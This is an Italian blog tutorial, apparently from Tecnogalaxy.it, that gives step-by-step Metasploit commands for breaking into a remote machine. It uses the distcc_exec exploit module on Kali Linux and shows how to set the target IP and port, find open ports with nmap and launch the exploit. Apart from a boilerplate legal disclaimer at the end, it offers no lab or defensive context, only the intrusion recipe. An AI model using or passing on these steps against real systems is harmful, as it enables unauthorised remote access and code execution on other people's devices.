Già molte volte abbiamo discusso su come entrare in un dispositivo mediante remote host e remote port ovvero conoscendo il suo IP remoto e la sua porta remota; e ovviamente i metodi per svolgere ciò sono tanti, ma veramente tanti, e noi li andremo tutti ad analizzare nel dettaglio. Oggi ci troviamo ad occuparci di una particolare tecnica che prende il nome di exploit/unix/misc/distcc_exec, una delle miriade di tecniche hacking che ci mette a disposizione la msfconsole di metasploit framework, completa piattaforma per gli appassionati di hacking e cracking, adoperata soprattutto su Kali Linux, il sistema operativo più utilizzato dagli hacker di tutto il mondo. Oggi nel nostro tutorial faremo riferimento proprio a Kali, che ci guiderà in tutti i passaggi necessari per riuscire ad accedere a un dispositivo remoto mediante il suo host remoto e la sua porta remota. Senza giri di parole iniziamo subito a vedere come svolgere questo procedimento

Innanzitutto apriamo un nuovo terminale e digitiamo “msfconsole” che richiamerà appunto la console di metasploit framework

Entrare in un dispositivo mediante remote host e remote port

 

 

 

 

 

Successivamente procediamo nei seguenti passaggi:

-use exploit/unix/misc/distcc_exec

Entrare in un dispositivo mediante remote host e remote port

 

 

 

 

 

-set RHOST “indirizzo ip remoto”

Entrare in un dispositivo mediante remote host e remote port

 

 

 

 

 

-set RPORT “porta remota”

N.B La porta remota possiamo ottenerla mediante una scansione di nmap digitando:

“nmap indirizzo ip remoto”

Entrare in un dispositivo mediante remote host e remote port

 

 

 

 

 

-exploit

Entrare in un dispositivo mediante remote host e remote port

 

 

 

 

 

Per qualsiasi chiarimento potete digitare nel terminale il comando “help” che vi permetterà di venire a conoscenza di tutte le azioni che potete svolgere.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

 

 

 

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.